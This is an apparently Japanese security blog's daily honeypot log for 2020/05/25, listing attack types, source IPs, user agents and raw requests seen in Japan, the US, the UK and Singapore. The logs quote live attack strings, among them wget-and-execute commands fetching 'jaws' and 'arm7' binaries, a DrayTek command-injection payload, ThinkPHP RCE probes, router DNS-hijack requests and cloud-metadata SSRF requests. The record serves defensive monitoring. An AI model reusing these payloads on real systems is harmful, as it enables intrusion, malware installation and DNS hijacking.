2020/05/25 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2020/05/25分です。

特徴

Location：JP

DrayTek製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
D-link製品へDNS hijackingを狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
XTCによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
18[.]179[.]20[.]5に関する不正通信
を確認しました。

Location：US

DrayTek製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
XTCによるスキャン行為
Apache Solrへのスキャン行為
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  185.172.110.241/jaws;
sh /tmp/jaws

Location：UK

ThinkPHPの脆弱性を狙うアクセス
ZyXELのNAS製品の脆弱性(CVE-2020-9054)を狙うアクセス
D-link製品へDNS hijackingを狙うアクセス
XTCによるスキャン行為
zgrabによるスキャン行為
132[.]145[.]66[.]34に関する不正通信
を確認しました。

Location：SG

DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZyXELのNAS製品の脆弱性(CVE-2020-9054)を狙うアクセス
D-link製品へDNS hijackingを狙うアクセス
Nakumaによるスキャン行為
polaris botnetによるスキャン行為
XTCによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
を確認しました。

他

アクセス数推移

JP：総アクセス数：65 (前日比：-98)
US：総アクセス数：30 (前日比：-114)
UK：総アクセス数：323 (前日比：+304)
SG：総アクセス数：36 (前日比：+2)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
7	5.101.0.209	Russia
34	44.225.84.206	United States
3	51.159.71.63	France
1	162.243.145.46	United States
1	170.239.27.174	Brazil
1	179.49.60.210	Ecuador
1	183.215.125.143	China
7	185.234.217.231	Ireland
1	193.42.99.162	United States
5	195.54.160.123	Russia
4	195.54.160.130	Russia

UserAgent一覧

件数	UserAgent
23	-
14	AWS Security Scanner
2	M/1.0
7	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36
16	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 zgrab/0.x
2	XTC

リクエスト内容一覧

件数	Method	Request	Protocol
10		\x16\x03\x01
10	CONNECT	18[.]179[.]20[.]5:80	HTTP/1.0
3	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
3	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=111.90.159.53&dnsSecondary=8.8.8.8	HTTP/1.1
1	GET	/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=111.90.159.53&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP	HTTP/1.1TE:
1	GET	/dnscfg.cgi?dnsPrimary=111.90.159.53&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1	HTTP/1.1
1	GET	/etc/passwd	HTTP/1.1
1	GET	/hudson	HTTP/1.1
3	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	HTTP/1.1
4	GET	/latest/dynamic/instance-identity/document	HTTP/1.1
2	GET	/myjsp.jsp	HTTP/1.1
3	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	GET	http://[::ffff:a9fe:a9fe]/	HTTP/1.1
2	GET	http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document	HTTP/1.1
2	GET	http[:]//169[.]254[.]169[.]254/	HTTP/1.1
2	GET	http[:]//169[.]254[.]169[.]254/latest/dynamic/instance-identity/document	HTTP/1.1
2	GET	http[:]//example[.]com/	HTTP/1.1
1	HEAD	/robots.txt	HTTP/1.0
2	POST	/api/jsonws/invoke	HTTP/1.1
2	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1
1	POST	/cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
4	PUT	/myjsp.jsp/	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
10	42.240.134.14	China
2	122.116.190.105	Taiwan
1	123.49.35.178	Bangladesh
10	129.204.201.59	China
1	159.89.142.222	United States
5	195.54.160.130	Russia
1	223.152.74.237	China

UserAgent一覧

件数	UserAgent
4	-
2	Go-http-client/1.1
5	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
18	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1	XTC

リクエスト内容一覧

件数	Method	Request	Protocol
2		-
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
2	GET	/TP/html/public/index.php	HTTP/1.1
2	GET	/TP/index.php	HTTP/1.1
2	GET	/TP/public/index.php	HTTP/1.1
2	GET	/elrekt.php	HTTP/1.1
2	GET	/html/public/index.php	HTTP/1.1
2	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	HTTP/1.1
2	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1	HTTP/1.1
2	GET	/public/index.php	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+ 185.172.110.241/jaws;sh+/tmp/jaws
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
2	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	POST	/HNAP1/	HTTP/1.0
1	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1
2	POST	/index.php?s=captcha	HTTP/1.1

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	51.159.71.63	France
10	61.153.110.83	China
1	162.243.142.64	United States
1	186.136.191.5	Argentina
1	187.190.221.119	Mexico
1	190.145.12.58	Colombia
1	195.54.160.123	Russia
305	207.238.80.75	United States
1	213.193.19.63	Russia

UserAgent一覧

件数	UserAgent
306	-
1	Go-http-client/1.1
1	M/1.0
2	Mozilla/5.0
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1	Mozilla/5.0 zgrab/0.x
2	XTC

リクエスト内容一覧

件数	Method	Request	Protocol
1	%00	%00 %00/%00
2	ABCD	/	HTTP/1.1
1	ABCD	ABCD	HTTP/1.1
3	ABCD	HTTP/1.1
1	BDMT	/index.html	HTTP/6.7
2	CONNECT	HTTP/1.1
1	GET	/../../../../../../../../../../../	HTTP/1.1
1	GET	/../../..//index.html	HTTP/1.0
1	GET	/..//index.html	HTTP/1.1
1	GET	/../index.html	HTTP/6.7
1	GET	/../index.html	HTTP/1.0
1	GET	/../index.html	HTTP/1.1
1	GET	/../index.html
1	GET	/////index.html	HTTP/1.1
1	GET	`/<script>alert(53416)</script>`	HTTP/1.1
1	GET	/BlackCatCMS/	HTTP/1.1
1	GET	/Collabtive/	HTTP/1.1
1	GET	/Concrete5/	HTTP/1.1
1	GET	/CubeCart/	HTTP/1.1
1	GET	/DokuWiki/	HTTP/1.1
1	GET	/GLPI/	HTTP/1.1
1	GET	/HumHub/	HTTP/1.1
1	GET	/Joomla/	HTTP/1.1
1	GET	/MODX/	HTTP/1.1
1	GET	/MODx/	HTTP/1.1
1	GET	/Magento/	HTTP/1.1
1	GET	/OpenDocMan/	HTTP/1.1
1	GET	/PivotX/	HTTP/1.1
1	GET	/PrestaShop/	HTTP/1.1
1	GET	/PyroCMS/	HTTP/1.1
1	GET	/ResourceSpace/	HTTP/1.1
1	GET	/Serendipity/	HTTP/1.1
1	GET	/SugarCE/	HTTP/1.1
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	GET	/TestLink/	HTTP/1.1
1	GET	/WebCalendar/	HTTP/1.1
1	GET	/\./index.html	HTTP/6.7
1	GET	/\./index.html
2	GET	/\./index.html	HTTP/1.1
1	GET	/_vti_bin/	HTTP/1.1
1	GET	/_vti_cnf/	HTTP/1.1
1	GET	/_vti_log/	HTTP/1.1
1	GET	/_vti_pvt/	HTTP/1.1
1	GET	/achievo/	HTTP/1.1
1	GET	/adaptcms/	HTTP/1.1
2	GET	/adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf	HTTP/1.1
1	GET	/ajaxplorer/	HTTP/1.1
1	GET	/appRain/	HTTP/1.1
1	GET	/apprain/	HTTP/1.1
1	GET	/asp/	HTTP/1.1
1	GET	/assets/	HTTP/1.1
1	GET	/assets/images/	HTTP/1.1
1	GET	/b2evolution/	HTTP/1.1
1	GET	/b97y2wrh9/	HTTP/1.1
1	GET	/bad397	HTTP/1.1
1	GET	/bad397/	HTTP/1.1
1	GET	/blackcatcms/	HTTP/1.1
1	GET	/cart/	HTTP/1.1
1	GET	/cerb/	HTTP/1.1
1	GET	/cgi-bin-sdb/	HTTP/1.1
1	GET	/cgi-bin/	HTTP/1.1
1	GET	/cgi/	HTTP/1.1
1	GET	/cgi_bin/	HTTP/1.1
1	GET	/cms/	HTTP/1.1
1	GET	/codoforum/	HTTP/1.1
1	GET	/collab/	HTTP/1.1
1	GET	/collaborate/	HTTP/1.1
1	GET	/collabtive/	HTTP/1.1
1	GET	/common/	HTTP/1.1
1	GET	/community/	HTTP/1.1
1	GET	/concrete5/	HTTP/1.1
1	GET	/confluence/	HTTP/1.1
1	GET	/console/login/LoginForm.jsp	HTTP/1.1
1	GET	/cubecart/	HTTP/1.1
1	GET	/d4bk93_capy/	HTTP/1.1
1	GET	/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=111.90.159.53&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP	HTTP/1.1TE:
1	GET	/dnscfg.cgi?dnsPrimary=111.90.159.53&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1	HTTP/1.1
1	GET	/doc/	HTTP/1.1
1	GET	/doc/packages/	HTTP/1.1
1	GET	/dokuwiki/	HTTP/1.1
1	GET	/dolibarr/	HTTP/1.1
1	GET	/doorgets/	HTTP/1.1
1	GET	/drupal/	HTTP/1.1
1	GET	/e107/	HTTP/1.1
1	GET	/eFront/	HTTP/1.1
1	GET	/ecb5jbb6r/	HTTP/1.1
1	GET	/efront/	HTTP/1.1
1	GET	/elrekt.php	HTTP/1.1
1	GET	/eyan2236li3bbl/	HTTP/1.1
1	GET	/false_55983	HTTP/1.1
1	GET	/false_55983/	HTTP/1.1
1	GET	/fastcgi/	HTTP/1.1
1	GET	/flyspray/	HTTP/1.1
1	GET	/forum/	HTTP/1.1
1	GET	/glpi/	HTTP/1.1
1	GET	/guia-negocios/	HTTP/1.1
1	GET	/helpdezk-community/	HTTP/1.1
1	GET	/helpdezk/	HTTP/1.1
1	GET	/hrm/	HTTP/1.1
1	GET	/html/	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
1	GET	/hudson	HTTP/1.1
1	GET	/humhub/	HTTP/1.1
1	GET	/icehrm/	HTTP/1.1
1	GET	/images/	HTTP/1.1
1	GET	/img/	HTTP/1.1
1	GET	/index.html	HTTP/rndmmtd
1	GET	/index.html	HTTP/0.9
3	GET	/index.html
1	GET	/index.html	HTTP/0.0
2	GET	/index.html	HTTP/1.2
1	GET	/index.html	HTTP/QUALYS
2	GET	/index.html	HTTP/6.7
1	GET	/index.html	QUALYS/1.1
16	GET	/index.html	HTTP/1.1
1	GET	/index.html	HTTP/1.1rndmmtd
1	GET	/index.html	HTTP/6.7rndmmtd
4	GET	/index.html	HTTP/1.0
3	GET	/index.html rndmmtd
1	GET	/index.html..........	HTTP/6.7
1	GET	/index.html..............	HTTP/1.1
1	GET	/index.html?advbjhvyivov	HTTP/1.1
1	GET	/index.html?rndmmtd	HTTP/1.1
1	GET	/index.html?test	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/iv2ft27z1od/	HTTP/1.1
1	GET	/j19rpr1enlm3w/	HTTP/1.1
1	GET	/jl4d3xdxagu/	HTTP/1.1
1	GET	/joomla/	HTTP/1.1
1	GET	/kexreh6s/	HTTP/1.1
1	GET	/liferay/	HTTP/1.1
1	GET	/login/	HTTP/1.1
1	GET	/m3ixveh01/	HTTP/1.1
1	GET	/magento/	HTTP/1.1
1	GET	/mail/	HTTP/1.1
1	GET	/manager/	HTTP/1.1
1	GET	/manual/	HTTP/1.1
1	GET	/manual/images/	HTTP/1.1
1	GET	/mediawiki/	HTTP/1.1
1	GET	/microweber/	HTTP/1.1
1	GET	/modx/	HTTP/1.1
1	GET	/moodle/	HTTP/1.1
1	GET	/movabletype/	HTTP/1.1
1	GET	/musnm37t/	HTTP/1.1
1	GET	/mybb/	HTTP/1.1
1	GET	/na9fmn350jy31/	HTTP/1.1
1	GET	/news/	HTTP/1.1
1	GET	/obsn3iqqr9jyx9qo6xn
1	GET	/obsn3iqqr9jyx9qo6xn	HTTP/6.7
4	GET	/obsn3iqqr9jyx9qo6xn	HTTP/1.1
1	GET	/obsn3iqqr9jyx9qo6xn	HTTP/1.0
1	GET	/obsn3iqqr9jyx9qo6xn/../index.html	HTTP/1.1
1	GET	/odm/	HTTP/1.1
1	GET	/okf3rg79emoocm/	HTTP/1.1
1	GET	/opendocman/	HTTP/1.1
1	GET	/opensourcepos/	HTTP/1.1
1	GET	/ota3fn4c/	HTTP/1.1
1	GET	/ownCloud/	HTTP/1.1
1	GET	/owncloud/	HTTP/1.1
1	GET	/perl/	HTTP/1.1
1	GET	/php/	HTTP/1.1
1	GET	/phpBB/	HTTP/1.1
1	GET	/phpBB3/	HTTP/1.1
1	GET	/phpMyAdmin/	HTTP/1.1
1	GET	/phpbb/	HTTP/1.1
1	GET	/phpbb3/	HTTP/1.1
1	GET	/phpgb/	HTTP/1.1
1	GET	/phpmyadmin/	HTTP/1.1
1	GET	/phpnuke/	HTTP/1.1
1	GET	/phpwcms/	HTTP/1.1
1	GET	/pivotx/	HTTP/1.1
1	GET	/pligg-cms/	HTTP/1.1
1	GET	/pligg/	HTTP/1.1
1	GET	/postnuke/	HTTP/1.1
1	GET	/prestashop/	HTTP/1.1
1	GET	/project/	HTTP/1.1
1	GET	/projekt/	HTTP/1.1
1	GET	/pub/	HTTP/1.1
1	GET	/public/index.php	HTTP/1.1
1	GET	/pwn48f4xt4o7/	HTTP/1.1
1	GET	/pydio/	HTTP/1.1
1	GET	/pyrocms/	HTTP/1.1
1	GET	/q0wga9bu7qm/	HTTP/1.1
1	GET	/qpu9xt25zpwc0q/	HTTP/1.1
1	GET	/recipe/	HTTP/1.1
1	GET	/recipe/assets/	HTTP/1.1
1	GET	/recipe/recipe/	HTTP/1.1
1	GET	/redaxscript/	HTTP/1.1
1	GET	/resourcespace/	HTTP/1.1
1	GET	/rhjz5b54r4w5n/	HTTP/1.1
1	GET	/rlinlvernaga/	HTTP/1.1
1	GET	/s1hqy45xm/	HTTP/1.1
1	GET	/samples/	HTTP/1.1
1	GET	/sbd30_o9/	HTTP/1.1
1	GET	/scripts/	HTTP/1.1
1	GET	/serendipity/	HTTP/1.1
1	GET	/servlet/	HTTP/1.1
1	GET	/sn0ukkjhq97zmw/	HTTP/1.1
1	GET	/social/	HTTP/1.1
1	GET	/spip/	HTTP/1.1
1	GET	/storage/	HTTP/1.1
1	GET	/sugarce/	HTTP/1.1
1	GET	/sugarcrm/	HTTP/1.1
1	GET	/test/	HTTP/1.1
1	GET	/testlink/	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/tikiwiki/	HTTP/1.1
1	GET	/tl59d9hp3/	HTTP/1.1
1	GET	/trw5r0o6xtv08/	HTTP/1.1
1	GET	/twiki/	HTTP/1.1
1	GET	/typo3/	HTTP/1.1
1	GET	/typo3/typo3/	HTTP/1.1
1	GET	/usemod/	HTTP/1.1
1	GET	/usr/doc/	HTTP/1.1
1	GET	/vTigerCRM/	HTTP/1.1
1	GET	/v_2o4py43u/	HTTP/1.1
1	GET	/vcms/	HTTP/1.1
1	GET	/vncviewer.jar	HTTP/1.1
1	GET	/vpwvgao/	HTTP/1.1
1	GET	/vtigercrm/	HTTP/1.1
1	GET	/vyi4dxgy9/	HTTP/1.1
1	GET	/wacko/	HTTP/1.1
1	GET	/wbce/	HTTP/1.1
1	GET	/webcalendar/	HTTP/1.1
1	GET	/webmail/	HTTP/1.1
1	GET	/wiki/	HTTP/1.1
1	GET	/wikka/	HTTP/1.1
1	GET	/wolfcms/	HTTP/1.1
1	GET	/wordpress/	HTTP/1.1
1	GET	/wordpress/wp-content/plugins/	HTTP/1.1
1	GET	/wp-content/plugins/	HTTP/1.1
1	GET	/wp/	HTTP/1.1
1	GET	/wsh6ysfcwtsk/	HTTP/1.1
1	GET	/xoops/	HTTP/1.1
1	GET	/xv29fzzf4wn8/	HTTP/1.1
1	GET	/z_bkboirw6/	HTTP/1.1
1	GET	/zen-cart/	HTTP/1.1
1	GET	/zencart/	HTTP/1.1
1	GET	/zt7t64266/	HTTP/1.1
2	GET	HTTP/1.1
2	GET	http[:]//132[.]145[.]66[.]34:80/index.html	HTTP/1.1
1	GET	http[:]//Qualys[.]null/	HTTP/1.0
1	GET/index.html	HTTP/1.1
1	GET/obsn3iqqr9jyx9qo6xn	HTTP/1.1
1	HEA	/index.html	HTTP/1.1
1	HEAD	/	HTTP/1.0
2	HEAD	/index.html	HTTP/1.0
1	HEAD	/index.html	HTTP/0.9
1	HEAD	/index.html
2	HEAD	/index.html	HTTP/1.1
1	HEAD	/obsn3iqqr9jyx9qo6xn	HTTP/2.0
1	HEAD	/obsn3iqqr9jyx9qo6xn	HTTP/1.1
1	HEAD	/selfupdate/wuident.cab	HTTP/1.0
1	If-Match:	*
1	OPTIONS	/	HTTP/1.1
1	OPTIONS	/	HTTP/1.0
2	OPTIONS	/index.html	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
2	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1
1	POST	/index.html	HTTP/1.0
2	POST	/index.html	HTTP/1.1
1	POST	/index.html	QUALYS/1.1
1	POST	/index.php?s=captcha	HTTP/1.1
1	POST	/obsn3iqqr9jyx9qo6xn	HTTP/1.1
1	POST	/obsn3iqqr9jyx9qo6xn?rndmmtd	HTTP/1.1
2	PROPFIND	/	HTTP/1.1
2	QUALYS	/	HTTP/1.1
1	RNDMMTD	/index.html	HTTP/1.0
1	SEARCH	/	HTTP/1.1
1	TRACE	/	HTTP/1.1
2	get	/index.html	HTTP/1.0
2	get	/index.html	HTTP/1.1
1	rndmmtd	/	HTTP/1.1
1	rndmmtd	/index.html	HTTP/1.1
1	rndmmtd	/index.html	HTTP/1.0
1	rndmmtd	/obsn3iqqr9jyx9qo6xn	HTTP/1.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
7	5.101.0.209	Russia
1	14.205.208.64	China
1	47.96.238.123	China
2	51.159.71.63	France
1	67.204.43.141	United States
1	72.4.34.117	United States
1	74.105.81.187	United States
1	91.203.61.191	Ukraine
1	94.20.64.42	Azerbaijan
1	112.121.7.248	South Korea
1	115.72.4.20	Vietnam
1	156.96.156.39	United States
1	162.243.136.98	United States
2	183.215.125.142	China
1	183.238.3.28	China
1	189.206.150.222	Mexico
1	193.112.8.175	China
4	195.54.160.123	Russia
7	195.54.160.130	Russia

UserAgent一覧

件数	UserAgent
3	-
1	M/1.0
3	Mozilla/5.0
18	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1	Mozilla/5.0 zgrab/0.x
2	Nakuma
6	XTC
1	polaris botnet

リクエスト内容一覧

件数	Method	Request	Protocol
3	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
3	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
2	GET	/adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf	HTTP/1.1
1	GET	/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=111.90.159.53&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP	HTTP/1.1TE:
1	GET	/dnscfg.cgi?dnsPrimary=111.90.159.53&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1	HTTP/1.1
1	GET	/hudson	HTTP/1.1
3	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	HTTP/1.1
3	GET	/solr/admin/info/system?wt=json	HTTP/1.1
2	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/webdav/	HTTP/1.1
1	HEAD	/robots.txt	HTTP/1.0
2	POST	/GponForm/diag_Form?images/	HTTP/1.1
2	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/boaform/admin/formPing	HTTP/1.1
6	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1
1	POST	/cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1